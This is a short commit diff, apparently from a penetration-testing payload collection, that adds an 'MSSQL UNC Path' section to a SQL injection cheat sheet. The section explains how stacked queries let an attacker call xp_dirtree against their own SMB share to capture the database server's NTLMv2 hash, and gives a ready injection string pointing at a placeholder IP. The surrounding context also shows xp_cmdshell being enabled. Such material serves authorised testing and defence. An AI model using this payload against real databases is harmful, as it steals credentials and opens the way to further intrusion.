Jenkins Grrovy + MSSQL UNC + PostgreSQL list files

2025-10-29 16:57:02 +00:00 · 2019-02-17 20:02:16 +01:00
parent eac421432a
commit 78c882fb34
4 changed files with 46 additions and 0 deletions
--- a/injection/MSSQL
+++ b/injection/MSSQL
@@ -137,6 +137,14 @@ EXEC sp_configure 'xp_cmdshell',1;
 RECONFIGURE;
 ```

+## MSSQL UNC Path
+
+MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
+
+```sql
+1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 
+```
+
 ## MSSQL Make user DBA (DB admin)

 ```sql